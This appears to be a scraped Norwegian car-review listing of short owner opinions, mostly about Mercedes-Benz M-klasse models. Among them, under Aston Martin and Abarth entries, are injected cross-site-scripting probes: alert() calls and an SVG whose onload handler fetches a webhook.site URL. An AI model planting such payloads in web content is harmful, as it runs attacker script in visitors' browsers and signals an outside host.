Vurdert av sveini96
Mercedes-Benz M-klasse (2014)
Nydelig bil både å eie og kjøre. Dette er min andre MB, begge med kun småplukk av feil. Den forrige hadde jeg i 9 år (E-klasse).
Mercedes-Benz M-klasse (2014)
Grei bil, men kostet nok mer enn den smakte.
Mercedes-Benz M-klasse (2014)
En meget behagelig bil å kjøre, som går overraskende billig. Innvendig støynivå er meget lavt
Mercedes-Benz M-klasse (2013)
Meget bra bil
Mercedes-Benz M-klasse (2012)
Nytelse å kjøre, masse plass og veldig stille. Hvis man kan skru litt selv så er ikke delene så dyre, så lenge man ikke kjøper "Orginale" deler. Masse brukte deler på markedet også. Merkever
Mercedes-Benz M-klasse (2012)
Har hatt bilen å nesten 5 år. Ingenting er røket og har kun tatt servicer. Veldig fornøyd. Begynner å bli gammel, men siden den er så snill så er det bare å beholde den :-)
Mercedes-Benz M-klasse (2012)
At tyske Dekra i 2016 var det vel, satte ML helt på topp av hele SUV-markedet mht driftssikkerhet (biler opptil 150.000 km) skjønner jeg nå. Det er også min erfaring og jeg vurderer å kjøre denn
Mercedes-Benz M-klasse (2012)
Drittbil
Mercedes-Benz M-klasse (2012)
Etter å ha kjørt MB i 20 år og 2 utgaver av ML ble dette min siste Mercedes på grunn av elendig service fra verkstedet.
Mercedes-Benz M-klasse (2012)
Etter å ha kjørt MB i 20 år og 2 utgaver av ML ble dette min siste Mercedes på grunn av elendig service fra verkstedet.
Mercedes-Benz M-klasse (2012)
Nydelig bil! Litt småplukk av driftsforstyrrelser - noe med elektronikk, og et gasspjel som hadde hengt seg opp.
Mercedes-Benz M-klasse (2012)
Slik en bil burde være!
Mercedes-Benz M-klasse (2012)
Det er en nytelse å kjøre denne bilen. Det er komfort i det meste, og fremkommeligheten er upåklagelig. Det som irriterer er at "politikerne" ikke vet hva AD-blue er og derfor ikke hensyntar, ell
Mercedes-Benz M-klasse (2012)
Flott bil
Mercedes-Benz M-klasse (2012)
Dette er min tredje Mercedes, og har vært like fornøyd med alle. Er særdeles tilfreds med hjelpesystemene som er tilgjengelig; blindsonevarsler, adaptiv cruisekontroll, parkeringssystem o.s.v. Min
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat